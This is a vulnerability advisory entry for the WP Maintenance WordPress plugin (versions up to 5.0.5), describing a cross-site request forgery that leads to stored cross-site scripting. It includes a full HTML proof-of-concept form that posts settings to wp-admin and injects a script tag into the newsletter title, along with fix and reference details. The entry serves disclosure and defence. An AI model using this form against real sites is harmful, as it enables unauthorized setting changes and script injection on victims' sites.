WP Maintenance <= 5.0.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting



Description
No nonce protection on form submissions leading to CSRF and no input/output sanitization allowing for XSS when CSRF is exploited. 
Proof of Concept
<html>
  <body>
   <form action="http://URL/wp-admin/admin.php?page=wp-maintenance" method="POST">
      <input type="hidden" name="action" value="update_general" />
      <input type="hidden" name="wp_maintenance_active" value="1" />
      <input type="hidden" name="wp_maintenance_settings[titre_maintenance]" value="Whatever" />
      <input type="hidden" name="wp_maintenance_settings[text_maintenance]" value="Come back quickly!" />
      <input type="hidden" name="wp_maintenance_settings[text_bt_maintenance]" value="" />
      <input type="hidden" name="wp_maintenance_settings[add_wplogin]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[add_wplogin_title]" value="" />
      <input type="hidden" name="wp_maintenance_settings[enable_seo]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[seo_title]" value="" />
      <input type="hidden" name="wp_maintenance_settings[seo_description]" value="" />
      <input type="hidden" name="wp_maintenance_settings[favicon]" value="" />
      <input type="hidden" name="wp_maintenance_settings[code_analytics]" value="" />
      <input type="hidden" name="wp_maintenance_settings[domain_analytics]" value="URL" />
      <input type="hidden" name="wp_maintenance_social_options[enable]" value="0" />
      <input type="hidden" name="wp_maintenance_social_options[texte]" value="" />
      <input type="hidden" name="wp_maintenance_social[facebook]" value="" />
      <input type="hidden" name="wp_maintenance_social[twitter]" value="" />
      <input type="hidden" name="wp_maintenance_social[linkedin]" value="" />
      <input type="hidden" name="wp_maintenance_social[flickr]" value="" />
      <input type="hidden" name="wp_maintenance_social[youtube]" value="" />
      <input type="hidden" name="wp_maintenance_social[pinterest]" value="" />
      <input type="hidden" name="wp_maintenance_social[vimeo]" value="" />
      <input type="hidden" name="wp_maintenance_social[instagram]" value="" />
      <input type="hidden" name="wp_maintenance_social[google_plus]" value="" />
      <input type="hidden" name="wp_maintenance_social[about_me]" value="" />
      <input type="hidden" name="wp_maintenance_social[soundcloud]" value="" />
      <input type="hidden" name="wp_maintenance_social[skype]" value="" />
      <input type="hidden" name="wp_maintenance_social[tumblr]" value="" />
      <input type="hidden" name="wp_maintenance_social[blogger]" value="" />
      <input type="hidden" name="wp_maintenance_social[paypal]" value="" />
      <input type="hidden" name="wp_maintenance_social_options[size]" value="32" />
      <input type="hidden" name="wp_maintenance_social_options[style]" value="style1" />
      <input type="hidden" name="wp_maintenance_social_options[position]" value="bottom" />
      <input type="hidden" name="wp_maintenance_social_options[align]" value="center" />
      <input type="hidden" name="wp_maintenance_social_options[theme]" value="" />
      <input type="hidden" name="wp_maintenance_social_options[reset]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[newletter]" value="1" />
      <input type="hidden" name="wp_maintenance_settings[title_newletter]" value="<script>alert(1)</script>" />
      <input type="hidden" name="wp_maintenance_settings[type_newletter]" value="shortcode" />
      <input type="hidden" name="wp_maintenance_settings[code_newletter]" value="" />
      <input type="hidden" name="wp_maintenance_settings[iframe_newletter]" value="" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 5.0.7

References

URL https://www.wordfence.com/blog/2019/11/high-severity-vulnerability-patched-in-wp-maintenance-plugin/
URL https://plugins.trac.wordpress.org/changeset/2194668/wp-maintenance

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 7113
Verified No
WPVDB ID 9954

Timeline

Publicly Published 2019-11-19 (25 days ago)
Added 2019-11-19 (25 days ago)
Last Updated 2019-11-28 (16 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin